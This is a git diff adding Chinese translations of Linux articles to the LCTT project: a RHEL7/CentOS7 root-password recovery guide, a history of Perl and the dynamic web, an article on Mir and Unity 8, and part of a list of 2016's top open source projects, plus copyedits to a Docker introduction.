-**配置管理工具(Puppet,Chef 等)** +**配置管理工具(Puppet、Chef 等)** > 尽管 Docker 能够显著提高一个组织管理应用程序及其依赖的能力,但不能完全取代传统的配置管理工具。Dockerfile 文件用于定义一个容器构建时内容,但不能持续管理容器运行时的状态和 Docker 的宿主系统。 -**部署框架(Capistrano,Fabric等)** +**部署框架(Capistrano、Fabric等)** -> Docker 通过创建自成一体的容器镜像,简化了应用程序在所有环境上的部署过程。这些用于部署的容器镜像封装了应用程序的全部依赖。然而 Docker 本身不无法执行复杂的自动化部署任务。我们通常使用其他工具一起实现较大的工作流程自动化。 +> Docker 通过创建自成一体的容器镜像,简化了应用程序在所有环境上的部署过程。这些用于部署的容器镜像封装了应用程序的全部依赖。然而 Docker 本身无法执行复杂的自动化部署任务。我们通常使用其他工具一起实现较大的工作流程自动化。 -**工作负载管理工具(Mesos,Fleet等)** +**工作负载管理工具(Mesos、Fleet等)** > Docker 服务器没有集群的概念。我们必须使用其他的业务流程工具(如 Docker 自己开发的 Swarm)智能地协调多个 Docker 主机的任务,跟踪所有主机的状态及其资源使用情况,确保运行着足够的容器。 -**虚拟化开发环境(Vagrant等)** +**虚拟化开发环境(Vagrant 等)** > 对开发者来说,Vagrant 是一个虚拟机管理工具,经常用来模拟与实际生产环境尽量一致的服务器软件栈。此外,Vagrant 可以很容易地让 Mac OS X 和基于 Windows 的工作站运行 Linux 软件。由于 Docker 服务器只能运行在 Linux 上,于是它提供了一个名为 Boot2Docker 的工具允许开发人员在不同的平台上快速运行基于 Linux 的 Docker 容器。Boot2Docker 足以满足很多标准的 Docker 工作流程,但仍然无法支持 Docker Machine 和 Vagrant 的所有功能。 -如果没有参考标准,很难理解 Docker 的作用。下一章我们将简要介绍,什么是 Docker,它的目标使用场景,以及 它的优势。 +如果没有强有力的参考标准,很难理解 Docker 的作用。下一章我们将概览 Docker,它是什么,它的目标使用场景,以及它的优势。 ----------------- 作者简介: #### [Karl Matthias][1] -Karl Matthias 曾先在创业公司和世界 500 强企业中担任过开发人员,系统管理员和网络工程师。在德国和英国的初创公司工作了若干年后,他和家人回到了美国俄勒冈州波特兰,在 New Relic 公司担任首席网站可靠性工程师。业余时间,他会和他的两个女儿玩,用他那老式相机摄摄影,或者骑骑自行车。 +Karl Matthias 曾在创业公司和世界 500 强企业中担任过开发人员,系统管理员和网络工程师。在德国和英国的初创公司工作了若干年后,他和家人回到了美国俄勒冈州波特兰,在 New Relic 公司担任首席网站可靠性工程师。业余时间,他会和他的两个女儿玩,用他那老式相机摄摄影,或者骑骑自行车。 #### [Sean Kane][2] @@ -98,9 +98,9 @@ Sean Kane 目前在 New Relic 公司的共享基础设施团队中担任首席 via: https://www.oreilly.com/learning/what-is-docker -作者:[Karl Matthias ][a],[Sean Kane][b] -译者:[译者ID](https://github.com/Cathon) -校对:[校对者ID](https://github.com/校对者ID) +作者:[Karl Matthias][a],[Sean Kane][b] +译者:[Cathon](https://github.com/Cathon) +校对:[jasminepeng](https://github.com/jasminepeng) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/20160908 How to reset the root password in RHEL7CentOS7Scientific Linux 7- based systems.md b/published/20160908 How to reset the root password in RHEL7CentOS7Scientific Linux 7- based systems.md new file mode 100644 index 0000000000..1b0bd799f6 --- /dev/null +++ b/published/20160908 How to reset the root password in RHEL7CentOS7Scientific Linux 7- based systems.md @@ -0,0 +1,85 @@ +如何重置 RHEL7/CentOS7 系统的密码 +================= + +### 介绍 + +**目的** + +在 RHEL7/CentOS7/Scientific Linux 7 中重设 root 密码。 + +**要求** + +RHEL7 / CentOS7 / Scientific Linux 7 + +**困难程度** + +中等 + +### 指导 + +RHEL7 的世界发生了变化,重置 root 密码的方式也一样。虽然中断引导过程的旧方法(init=/bin/bash)仍然有效,但它不再是推荐的。“Systemd” 使用 “rd.break” 来中断引导。让我们快速浏览下整个过程。  + +**启动进入最小模式** + +重启系统并在内核列表页面在系统启动之前按下 `e`。你会进入编辑模式。 + +**中断启动进程** + +在内核字符串中 - 在以 `linux 16 /vmlinuz- ect` 结尾的行中输入 `rd.break`。接着 `Ctrl+X` 重启。系统启动进入初始化内存磁盘,并挂载在 `/sysroot`。在此模式中你不需要输入密码。 + +**重新挂载文件系统以便读写** + +``` +switch_root:/# mount -o remount,rw /sysroot/ +``` + +**使 /sysroot 成为根目录** + +``` +switch_root:/# chroot /sysroot +``` + +命令行提示符会稍微改变。 + +**修改 root 密码** + +``` +sh-4.2# passwd +``` + +**加载 SELinux 策略** + +``` +sh-4.2# load_policy -i +``` + +**在 /etc/shadow 中设置上下文类型** + +``` +sh-4.2# chcon -t shadow_t /etc/shadow +``` + +注意:你可以通过如下创建 `autorelabel` 文件的方式来略过最后两步,但自动重建卷标会花费很长时间。 + +``` +sh-4.2# touch /.autorelabel +``` + +因为这个原因,尽管它更简单,它应该作为“懒人选择”,而不是建议。 + +**退出并重启** + +退出并重启并用新的 root 密码登录。 + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-reset-the-root-password-in-rhel7-centos7-scientific-linux-7-based-systems + +作者:[Rado Folwarczny][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/how-to-reset-the-root-password-in-rhel7-centos7-scientific-linux-7-based-systems + diff --git a/published/20161103 Perl and the birth of the dynamic web.md b/published/20161103 Perl and the birth of the dynamic web.md new file mode 100644 index 0000000000..175fed8226 --- /dev/null +++ b/published/20161103 Perl and the birth of the dynamic web.md @@ -0,0 +1,90 @@ +Perl 与动态网站的诞生 +================== + +> 在新闻组和邮件列表里、在计算机科学实验室里、在各大陆之间,流传着一个神秘的故事,那是关于 Perl 与动态网站之间的不得不说的往事。 + +![Perl and the birth of the dynamic web](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/osdc-lead-web-internet.png?itok=hq81pSDs "Perl and the birth of the dynamic web") + +>图片来源 : [Internet Archive Book Images][30], 由 Opensource.com 修改. [CC BY-SA 4.0][29]. + +早期互联网历史中,有一些脍炙人口的开创性事件:如 蒂姆·伯纳斯·李(Tim Berners-Lee)在邮件组上[宣布][28] WWW-project 的那天,该文档随同 [CERN][27] 发布的项目代码进入到了公共域,以及 1993 年 1 月的[第一版 NCSA Mosaic 浏览器][26]。虽然这些独立的事件是相当重要的,但是当时的技术的开发已经更为丰富,不再是由一组的孤立事件组成,而更像是一系列有内在联系的故事。 + +这其中的一个故事描述的是网站是如何变成_动态的_,通俗说来就是我们如何使服务器除了提供静态 HTML 文档之外做更多的事。这是个流传在[新闻组][25]和邮件列表间、计算机科学实验室里、各个大陆之间的故事,重点不是一个人,而是一种编程语言:Perl。 + +### CGI 脚本和信息软件 + +在上世纪 90 年代中后期,Perl 几乎和动态网站是同义词。Perl 是一种相对来说容易学习的解释型语言,并且有强大的文本处理特性,使得它能够很容易的编写脚本来把一个网站关联到数据库、处理由用户发送的表单数据,当然,还要创造那些上世纪 90 年代的网站的经典形象——计数器和留言簿。 + +类似的网站特性渐渐的变成了 CGI 脚本的形式,其全称为通用网关接口(Common Gateway Interface),[首个实现][24]由 Rob McCool 于 1993 年 11 月在 NCSA HTTPD 上完成。CGI 是目的是直面功能,并且在短短几年间,任何人都可以很容易的找到一些由 Perl 写的预制的脚本存档。有一个声名狼籍的案例就是 [Matt's Scripts Archive][23],这是一种流行却包含各种安全缺陷的源代码库,它甚至使得 Perl 社区成员创建了一种被称为 [Not Matt‘s Scripts][22] 的更为专业的替换选择。 + +在当时,无论是业余爱好者,还是职业程序员都采用 Perl 来制作动态网站和应用,Tim O’Reilly [创造了词汇“信息软件(infoware)”][21] 来描述网站和 Perl 怎样成为变化中的计算机工业的一部分。考虑到 Yahoo!和 Amazon 带来的创新,O‘Reilly 写道:“传统软件在大量的软件中仅仅包含了少量的信息;而信息软件则在少量的软件中包含了大量的信息。” Perl 是一种像瑞士军刀一样的完美的小而强大的工具,它支撑了信息媒体从巨大的网站目录向早期的用户生成内容(UGC)平台的转变。 + +### 题外话 + +尽管使用 Perl 来制作 CGI 简直是上佳之选,但是编程语言和不断提升中的动态网站之间的关系变得更加的密切与深入。从[第一个网站][20](在 1990 年的圣诞节前)出现到 1993 年 McCool 实现 CGI 的短暂时期内,Web 上的各种东西,比如表单、图片以及表格,就这么逐渐出现在上世纪 90 年代乃至后来。尽管伯纳斯·李也对这些早期的岁月产生了影响,但是不同的人看到的是 Web 不同的潜在作用,并将它推向各自不同的方向。一方面,这样的结果来自一些著名的辩论,例如 [HTML 应该和 SGML 保持多近的关系][19]、[是否应该实现一个图像标签][18]等等。在另一方面,在没有直接因素影响的情况下改变是极其缓慢的。后者已经很好的描述了动态网站是如何发展的。 + +从某种意义上说,第一个“网关”的诞生可以追溯到 1991 至 1992 年之间(LCTT 译注:此处所谓“网关”的意义请参照 CGI 的定义),当时伯纳斯·李和一些计算机科学家与超文本爱好者[编写服务程序][17]使得一些特定的资源能够连接到一起,例如 CERN 的内部应用程序、通用的应用程序如 Oracle 数据库、[广域信息查询系统(WAIS)][16] 等等。(WAIS 是 Web 的前身,上世纪 80 年代后期开发,其中,开发者之一 [Brewster Kahle][15],是一个数字化图书管理员和 [Internet Archive][14] 的创始人。)可以这样理解,“网关”就是一个被设计用来连接其它 Web、数据库或者应用程序的定制的 Web 服务器。任何的动态功能就意味着在不同的端口上运行另外一个守护进程(参考阅读,例如伯纳斯·李对于在网站上[如何添加一个搜索功能][13] 的描述)。伯纳斯·李期望 Web 可以成为不同信息系统之间的通用接口,并且鼓励建立单一用途服务。他也提到 Perl 是一种强大的(甚至是不可思议)、可以将各种东西组合起来的语言。 + +然而,另一种对“网关”的理解指出它不一定是一个定制设备,可能只是一个脚本,一个并不需要额外服务器的低吞吐量的附加脚本。这种形式的首次出现是有争议性的 Jim Davis 的 [Gateway to the U Mich Geography server][11],于 1992 年的 11 月发布在了 WWW-talk 邮件列表中。Davis 的脚本是使用 Perl 编写的,是一种 Web API 的原型,基于格式化的用户查询从另外的服务器拉取数据。我们来说明一下这两种对于网关的理解的不同之处,伯纳斯·李[回复了][10] Davis 的邮件,期望他和 Michigan 服务器的作者“能够达成某种共识”,“从网络的角度来看的话”仅使用一台服务器来提供这样的信息可能会更有意义。伯纳斯·李,可能是期待着 Web 的发明者可以提出一种有秩序的信息资源访问方式。这样从不同服务器上拉取数据的网关和脚本意味着一种潜在的 Web 的质的变化,虽然不断增多,但也可能有点偏离了伯纳斯·李的原始观点。 + +### 回到 Perl HTTPD + +在 Davis 的地理服务器上的网关向标准化的、低吞吐量的、通过 CGI 方式实现的脚本化网关迈进的一步中,[Perl HTTPD][9] 的出现是很重要的事件,它是 1993 年初由印地安纳大学的研究生 Marc Van Heyningen 在布卢明顿(Bloomington)完全使用 Perl 语言实现的一个 Web 服务器程序。从 Van Heyningen 给出的[设计原则][8]来看,基于使用 Perl 就不需要任何的编译过程这样一种事实,使得它能够成为一种极易扩展的服务器程序,这个服务器包含了“一个向代码中增加新特性时只要简单的重启一下就可以,而不会有任何的宕机时间的特性”,使得这个服务器程序可以频繁的加入新功能。 + +Perl HTTPD 代表了那种服务器程序应该是单一、特定目的的观点。相应的,这种模式似乎暗示了在 Web 开发中像这样渐进式的、持续测试的软件产品可能会最终变成一种共识。Van Heyningen 在后来[提到过][7]他从头编写这样一个服务器程序的初衷是当时没有一种简便的方式使用 CERN 服务器程序来生成“虚拟文档”(例如,动态生成的页面),他打趣说使用 Perl 这样的“神之语言”来写可能是最简单的方式了。在他初期编写的众多脚本中有一个 Sun 操作系统的用户手册的 Web 界面,以及 [Finger 网关][6](这是一种早期用来共享计算机系统信息或者是用户信息的协议)。 + +虽然 Van Heyningen 将印地安纳大学的服务器主要用来连接现存的信息资源,他和研究生们同时也看见了作为个人发布形式的潜在可能。其中一件广为人知事件是在 1993-1994 年之间围绕着一个著名的加拿大案件而[公布][5]的一系列的文件、照片和新闻故事,与此形成鲜明对比的是,所有的全国性媒体都保持了沉默。 + +Perl HTTPD 没有坚持到现在的需要。今天,Van Heyningen 回忆起这个程序的时候认为这个程序只是当时的一个原型产品。它的原始目的只是向那些已经选择了 Gopher 作为大学的网络界面的资深教员们展示了网络的另一种利用方式。Van Heyningen 以[一种基于 Web 的、可搜索的出版物索引][4]的方式,用代码回应了他的导师们的虚荣。就是说,在服务器程序技术方面关键创新是为了赢得争论的胜利而诞生的,在这个角度上来看代码做到了所有要求它所做的事。 + +不管该服务器程序的生命是否短暂,伴随者 Perl HTTPD 一起出现的理念已经传播到了各个角落。Van Heyningen 开始收到了获取该代码的请求,而后将它分享到了网上,并提示说,需要了解一些 Perl 就可以将它移植到其它操作系统(或者找到一个这样的人也行)。不久之后,居住在奥斯汀(Austin)的程序员 Tony Sanders 开发了一个被称为 [Plexus][3] 的轻便版本。Sander 的服务器程序是一款全功能的产品,并且同样包含了 Perl HTTPD 所建议的易扩展性,而且添加一些新的特性如图片解码等。Plexus [直接影响了][2] Rob McCool 给 NCSA HTTPD 服务器上的脚本开发的“htbin”,并且同样影响到了不久之后诞生的通用网关接口(CGI)。 + +在这些历史遗产之外,感谢妙不可言的 Internet Archive(互联网时光机)使得 Perl HTTPD 在今天依然保留在一种我们依然可以获取的形式,你可以从[这里下载 tarball][1]。 + +### 历史展望 + +对于技术世界的颠覆来说,技术的改变总是在一个相互对立的过程中。现有的技术是思考新技术的基础与起点。过时的编程形式启迪了今天人们做事的新方式。网络世界的创新可能看起来更像是对于旧技术的扩展,不仅仅是 Perl。 + +在萌芽事件的简单的时间轴之外,Web 历史学者也许可以从 Perl 获取更多的线索。其中一部份的挑战在于材料的获取。更多需要做的事情包括从可获取的大量杂乱的数据中梳理出它的结构,将分散在邮件列表、归档网站,书本和杂志中的信息内容组合在一起。还有一部分的挑战是需要认识到 Web 的历史不仅仅是新技术发布的日子,它同时包括了个人记忆、人类情感与社会进程等,并且这不仅仅是单一的历史线而是有许许多多条相似的历史线组合而成的。就如 Perl 的信条一样“殊途同归。(There's More Than One Way To Do It.)” + +-------------------------------------------------------------------------------- + +via: https://opensource.com/life/16/11/perl-and-birth-dynamic-web + +作者:[Michael Stevenson][a] +译者:[wcnnbdk1](https://github.com/wcnnbdk1) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mstevenson +[1]:https://web.archive.org/web/20011126190051/http://www.cs.indiana.edu/perl-server/httpd.pl.tar.Z +[2]:http://1997.webhistory.org/www.lists/www-talk.1993q4/0516.html +[3]:https://web.archive.org/web/19990421192342/http://www.earth.com/server/doc/plexus.html +[4]:https://web.archive.org/web/19990428030253/http://www.cs.indiana.edu:800/cstr/search +[5]:https://web.archive.org/web/19970720205155/http://www.cs.indiana.edu/canada/karla.html +[6]:https://web.archive.org/web/19990429014629/http://www.cs.indiana.edu:800/finger/gateway +[7]:https://web.archive.org/web/19980122184328/http://www.cs.indiana.edu/perl-server/history.html +[8]:https://web.archive.org/web/19970720025822/http://www.cs.indiana.edu/perl-server/intro.html +[9]:https://web.archive.org/web/19970720025822/http://www.cs.indiana.edu/perl-server/code.html +[10]:https://lists.w3.org/Archives/Public/www-talk/1992NovDec/0069.html +[11]:https://lists.w3.org/Archives/Public/www-talk/1992NovDec/0060.html +[12]:http://info.cern.ch/hypertext/WWW/Provider/ShellScript.html +[13]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0109.html +[14]:https://archive.org/index.php +[15]:http://brewster.kahle.org/about/ +[16]:https://en.wikipedia.org/wiki/Wide_area_information_server +[17]:http://info.cern.ch/hypertext/WWW/Daemon/Overview.html +[18]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0182.html +[19]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0096.html +[20]:http://info.cern.ch/hypertext/WWW/TheProject.html +[21]:https://web.archive.org/web/20000815230603/http://www.edventure.com/release1/1198.html +[22]:http://nms-cgi.sourceforge.net/ +[23]:https://web.archive.org/web/19980709151514/http://scriptarchive.com/ +[24]:http://1997.webhistory.org/www.lists/www-talk.1993q4/0518.html +[25]:https://en.wikipedia.org/wiki/Usenet_newsgroup +[26]:http://1997.webhistory.org/www.lists/www-talk.1993q1/0099.html +[27]:https://tenyears-www.web.cern.ch/tenyears-www/ +[28]:https://groups.google.com/forum/#!msg/alt.hypertext/eCTkkOoWTAY/bJGhZyooXzkJ +[29]:https://creativecommons.org/licenses/by-sa/4.0/ +[30]:https://www.flickr.com/photos/internetarchivebookimages/14591826409/in/photolist-oeqVBX-xezHCD-otJDtG-whb6Qz-tohe9q-tCxH8y-xq4VfN-otJFfh-xEmn3b-tERUdv-oucUgd-wKDyLy-owgebW-xd6Wew-xGEvuT-toqHkP-oegBCj-xtDdzN-tF19ip-xGFbWP-xcQMJq-wxrrkN-tEYczi-tEYvCn-tohQuy-tEzFwN-xHikPT-oetG8V-toiGvh-wKEgAu-xut1qp-toh7PG-xezovR-oegRMa-wKN2eg-oegSRp-sJ29GF-oeqXLV-oeJTBY-ovLF3X-oeh2iJ-xcQBWs-oepQoy-ow4xoo-xknjyD-ovunVZ-togQaj-tEytff-xEkSLS-xtD8G1 diff --git a/published/20161128 Mir is not only about Unity8.md b/published/20161128 Mir is not only about Unity8.md new file mode 100644 index 0000000000..a9616942f9 --- /dev/null +++ b/published/20161128 Mir is not only about Unity8.md @@ -0,0 +1,85 @@ +Mir 并不只是 Unity 8 +============================================================ + +![mir](https://insights.ubuntu.com/wp-content/uploads/2cf2/MIR.png) + +_这是一篇来自 Canonical 的软件工程师 Alan Griffiths 的一篇游客文章。如果你也想投稿,请联系 ubuntu-devices@canonical.com_ + +Mir 是一个计算机显示的管理应用的支持项目。它可以与当前 Ubuntu 桌面(及很多其他桌面)上使用的、我们更熟悉的 X-Window 相比较。我下面会讨论 Mir 的一些动机,但本篇的目的是澄清 Mir 和 Unity 8 之间的关系。 + +大多数时候你听说 Mir 时都会提到 Unity 8。这并不奇怪,因为 Unity 8 是 Canonical 新的用户界面 shell,用户会一直与它交互。 Mir “只”使这成为可能。Unity 8 目前用于手机和平板电脑,也可以在 Ubuntu 16.10 桌面上“预览”它。 + +在这里我想解释一下,可以不用 Unity 8 也可以使用 Mir。要么作为替代 shell,要么作为嵌入式环境的更简单的界面:信息亭,电子标牌等。Mir “抽象层”证明了这一点,它提供了三个重要的元素: + +1. libmiral.so - Mir 的稳定接口,提供基本的窗口管理; +2. miral-shell - 一个提供“传统”和“平铺”窗口管理的示例 shell; +3. miral-kiosk - 一个仅提供基本窗口管理的示例“信息亭”。 + +miral-shell 和 miral-kiosk 示例服务器可从 zesty 的归档文件中获得,Kevin Gunn 已经在“Voices”上写了一篇基于 miral-kiosk 的“信息亭”的概览的[博文][1]。我将在下面给出更多关于使用这些例子的细节,但在[我的“voices”博客][2]上有更多(包括“如何”开发自己的替代 Mir 服务器)。 + +### 使用 MIR + +Mir 是一套编程库,而不是独立的程序。这意味着这需要程序去调用它实现相应的功能。有两种方式去使用 Mir 库:编写程序的时候作为“客户端”,或者在实现 shell 时作为“服务端”。客户端(和 X11 一起)典型是使用工具库,而不是直接使用 Mir(或者 X11)。 + +GTK、Qt 和 SDL2 中有对 Mir 的支持。当在那些工具库中启用对它的支持时(默认在 Ubuntu 中启用支持),意味着使用这些工具的程序应该“可以工作”于 Mir 中。除此之外还有一个 Xmir:一个运行于 Mir 的 X11 服务器,这允许基于 X 的服务运行在 Mir 服务端上。 + +但是开始之前 Mir 客户端需要一个相匹配的 Mir 服务端。在最后一个开发周期中,Mir 团队在演示中将 MirAL 作为编写 Mir 服务端的推荐方法,并推出了一个“miral-examples”包。在 Ubuntu 的开发版本 zesty 中,你可以从归档中安装它: + +``` +$ sudo apt install miral-examples mir-graphics-drivers-desktop qtubuntu-desktop +``` + +_对于其他平台,你需要自己构建 MirAL(有关详细信息,请参阅 Mir 桌面环境示例)。_ + +miral-examples 安装后你可以在 Unity 7 中以窗口的方式运行一个 Mir 服务端,然后在里面运行一个客户端(比如 gedit): + +``` +$ miral-shell& +$ miral-run gedit +``` + +这会给你一个(非常基础的)“传统” 的桌面窗口管理。另外你可以试下“平铺”窗口管理器: + +``` +$ miral-shell --window-manager tiling& +$ miral-run qterminal +``` + +或者(甚至更基础的)信息亭界面: + +``` +$ miral-kiosk& +$ miral-run 7kaa +``` + +这些 Mir 服务端都不会提供带有“启动器”、通知等的完整“桌面”。但是它们演示了不使用 Unity 8 使用 Mir 的可能。 + +### MIR 解决的问题 + +X-Window 系统已经是,并且仍然是,提供了一种与计算机的交互的非常成功的方式。它提供了广泛的硬件和驱动程序一致的抽象。它支持许多桌面环境和图形用户界面工具包,并可以让它们在大量计算机上一起工作。 + +但它来自一个与当前电脑使用方式非常不同的时代,现在有一些问题是很难满足的,因为它需要支持老旧的系统。 + +在 1980 年,大多数计算机是由专家管理的大型事物,将它们连接在一起“是非常困难的”。在那个时代,开发软件的成本是这样的,一个程序“监听”另一个程序获得的好处是可以忽略不计的:此时几乎没有计算机,同时它们是独立的,它们所有的工作和金融无关。 + +X-Window 开发于这种环境下,通过一系列扩展,它已经适应了许多变化。但它本质上是不安全的:任何应用程序可以知道显示了什么(并影响它)。你可以编写像 Xeyes(用“眼睛”跟踪光标)或“Tickeys”(通过键盘来生成打字机噪声)等应用程序。现实是,任何应用程序可以跟踪和操纵几乎所有的事情。这就是基于 X 的桌面如 Unity 7、Gnome、KDE及其它桌面工作的方式。 + +X-Window 中的窗口管理的开放性质不适合用于具有数百万计算机连接到因特网的世界,它们用于信用卡交易和网上银行,且由非专家管理,并自愿安装来自陌生人的程序。人们越来越意识到让 X-Window 适应新的安全性和图形性能的要求是不可行的。 + +现在至少有两个开源项目旨在提供一个替代品:Mir 和 Wayland。虽然有些人认为两者是竞争关系,但在很多领域,它们有共同的利益:它们都需要与那些之前假定使用 X11 的其它软件交互,并且许多引入支持的工作对两者都有益。 + +Canonical 的 X-Window 替换品 Mir,它只将信息暴露给它需要的应用程序(因此没有按键监听或光标跟踪)。它可以满足当前时代的需求,并可以利用现代硬件,如图形处理器。 + +-------------------------------------------------------------------------------- + +via: https://insights.ubuntu.com/2016/11/28/mir-is-not-only-about-unity8/ + +作者:[Guest][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://insights.ubuntu.com/author/guest/ +[1]:http://voices.canonical.com/kevin.gunn/ +[2]:http://voices.canonical.com/alan.griffiths/ diff --git a/published/20161226 Top 10 open source projects of 2016.md b/published/20161226 Top 10 open source projects of 2016.md new file mode 100644 index 0000000000..d7659c97dc --- /dev/null +++ b/published/20161226 Top 10 open source projects of 2016.md @@ -0,0 +1,183 @@ +2016 年十大顶级开源项目 +============================================================ + +> 在我们今年的年度顶级开源项目列表中,让我们回顾一下作者们提到的几个 2016 年受欢迎的项目,以及社区管理员选出的钟爱项目。 + +![Top 10 open source projects of 2016](https://opensource.com/sites/default/files/styles/image-full-size/public/images/law/bowling-10-ten-520_cc.png?itok=Jd1FYLWt "Top 10 open source projects of 2016") + +图片来自:[George Eastman House][1] 和 [Internet Archive Book Images][2] 。修改自 Opensource.com. CC BY-SA 4.0 + +我们持续关注每年新出现的、成长、改变和发展的优秀开源项目。挑选 10 个开源项目到我们的年度顶级项目列表中并不太容易,而且,也没有哪个如此短的列表能够包含每一个应该包含在内的项目。 + +为了挑选 10 个顶级开源项目,我们回顾了作者们 2016 年涉及到的流行的开源项目,同时也从社区管理员收集了一些意见。经过管理员的一番推荐和投票之后,我们的编辑团队选定了最终的列表。 + +它们就在这儿, 2016 年 10 个顶级开源项目: + +### Atom + +[Atom][3] 是一个来自 GitHub 的可魔改的(hackable)文本编辑器。Jono Bacon 在今年的早些时候为它的“简单核心”[写了一篇文章][4],对该开源项目所给用户带来的选择而大加赞赏。 + +“[Atom][3] 带来了大多数用户想要的主要核心特性和设置,但是缺失了一些用户可能想要的更加高级或独特的特性。……Atom 提供了一个强大的框架,从而允许它的许多部分都可以被改变或扩展。” + +如果打算开始使用 Atom, 请先阅读[这篇指南][5]。如果想加入到用户社区,你可以在 [GitHub][6]、[Discuss][7] 和 [Slack][8] 上找到 Atom 。 + +Atom 是 [MIT][9] 许可的,它的[源代码][10]托管在 GitHub 上。 + +### Eclipse Che + +[Eclipse Che][11] 是下一代在线集成开发环境(IDE)和开发者工作区。Joshua Allen Holm 在 2016 年 11 月为我们[点评][12]了 Eclipse Che,使我们可以一窥项目背后的开发者社区,Eclipse Che 创新性地使用了容器技术,并且开箱即用就支持多种流行语言。 + +“Eclipse Che 集成了就绪即用( ready-to-go)的软件环境(stack)覆盖了绝大多数现代流行语言。这包括 C++、Java、Go、PHP、Python、.NET、Node.js、Ruby on Rails 和 Android 开发的软件环境。软件环境仓库(Stack Library )如果不够的话,甚至还提供了更多的选择,你可以创建一个能够提供特殊环境的定制软件环境。” + +你可以通过网上的[托管账户][13]、[本地安装][14],或者在你常用的[云供应商][15]上测试 Eclipse Che。你也可以在 GitHub 上找到它的[源代码][16],发布于 [Eclipse 公开许可证][17]之下。 + +### FreeCAD + +[FreeCAD][18] 是用 Python 写的,是一款电脑辅助设计工具(或叫电脑辅助起草工具),可以用它来为实际物体创建设计模型。 Jason Baker 在 [3 款可供选择的 AutoCAD 的开源替代品][19]一文中写到关于 FreeCAD : + +“FreeCAD 可以从各种常见格式中导入和导出 3D 对象,其模块化结构使得它易于通过各种插件扩展基本功能。该程序有许多内置的界面选项,这包括从草稿到渲染器,甚至还有一个机器人仿真能力。” + +FreeCAD 是 [LGPL][20] 许可的,它的[源代码][21]托管在 GitHub 上。 + +### GnuCash + +[GnuCash][22] 是一个跨平台的开源桌面应用,它可以用来管理个人和小型商业账户。 Jason Baker 把 GnuCash 列入了我们针对个人金融的 Mint 和 Quicken 的开源替代品的[综述列表][23]中: + +GnuCash “具有多项记账的特性,能从多种格式导入数据,处理多重汇率,为你创建预算,打印支票,创建定制计划报告,并且能够直接从网上银行导入和拉取股票行情。” + +其发布于 GPL [版本 2 或版本 3 许可证][25]下,你可以在 GitHub 上找到 GnuCash 的[源代码][24]。 + +一个值得一提的 GnuCash 可选替代品是 [KMyMoney][26],它也得到了该列表的提名,是另一个在 Linux 上管理财务的好选择。 + +### Kodi + +[Kodi][27] 是一个开源媒体中心应用,之前叫做 XBMC,它能够在多种设备上工作,是一个用来 DIY 播放电影、TV、音乐的机顶盒的工具。 Kodi 高度可定制化,它支持多种皮肤、插件和许多遥控设备(包括它自己定制的 Android remote 应用)。 + +尽管今年我们没有深入地报道 Kodi, 但依旧出现在许多关于创建一个家用 Linux [音乐服务器][28]、媒体[管理工具][29]的文章中,还出现在之前的一个关于最喜爱的开源[视频播放器][30]的投票中(如果你在家中使用 Kodi,想要写一些自己的体验,[请让我们知道][31])。 + +其发布于 [GPLv2][33] 许可证下,你可以在 GitHub 上找到 Kodi 的[源代码][32]。 + +### MyCollab + +[MyCollab][34] 是一套针对顾客关系管理(CRM)、文档管理和项目管理的工具。社区管理员 Robin Muilwijk 在他的综述 [2016 年 11 个顶级的项目管理工具][35]一文中详细阐述了 MyCollab-Project 的细节: + +“MyCollab-Project 包含许多特性,比如甘特图、里程碑、时间跟踪和事件管理。它有 Kanban 板功能,因而支持敏捷开发模式。 MyCollab-Project 有三个不同的版本,其中[社区版][36]是自由且开源的。” + +安装 MyCollab 需要 Java 运行环境和 MySQL 环境的支持。请访问 [MyCollab 网站][37]来了解如何对项目做贡献。 + +MyCollab 是 AGPLv3 许可的,它的[源代码][38]托管在 GitHub 上。 + +### OpenAPS + +[OpenAPS][39] 是社区管理员在 2016 年发现的另一个有趣的项目,我们也深入报道过它。 OpenAPS,即 Open Artificial Pancreas System 项目,是一个致力于提高 1 型糖尿病患者生活质量的开源项目。 + +该项目包含“[一个专注安全的典范(reference)设计][40]、一个[工具箱][41]和一个开源的[典范(reference)实现][42],它们是为设备制造商或者任何能够构造人工胰腺设备的个人设计的,从而能够根据胰岛素水平安全地调节血液中葡萄糖水平。尽管潜在用户在尝试亲自构建或使用该系统前应该小心地测试该项目并和他们的健康护理医生讨论,但该项目的创建者希望开放技术能够加速医疗设备行业的研究和开发步伐,从而发现新的治疗方案并更快的投入市场。” + +### OpenHAB + +[OpenHAB][43] 是一个具有可插拔体系结构的家用自动化平台。社区管理员 D Ruth Bavousett 今年购买该平台并尝试使用以后为 OpenHAB [写到][44]: + +“我所发现的其中一个有趣的模块是蓝牙绑定;它能够发现特定的已启用蓝牙的设备(比如你的智能手机、你孩子的那些设备)并且在这些设备到达或离开的时候采取行动-关门或开门、开灯、调节恒温器和关闭安全模式等等” + +查看这个能够与社交网络、即时消息和云 IoT 平台进行集成和通讯的[绑定和捆绑设备的完整列表][45]。 + +OpenHAB 是 EPL 许可的,它的[源代码][46]托管在 GitHub 上。 + +### OpenToonz + +[OpenToonz][47] 是一个 2D 动画生产软件。社区管理员 Joshua Allen 在 2016 年 3 月[报道][48]了它的开源版本,在 Opensource.com 网站的其他动画相关的文章中它也有被提及,但是我们并没有深入介绍,敬请期待。 + +现在,我们可以告诉你的是, OpenToonz 有许多独一无二的特性,包括 GTS,它是吉卜力工作室(Studio Ghibli )开发的一个生成工具,还有一个用于图像处理的[效果插件 SDK][49]。 + +如果想讨论开发和视频研究的话题,请查看 GitHub 上的[论坛][50]。 OpenToonz 的[源代码][51]托管在 GitHub 上,该项目是以 BSD 许可证发布。 + 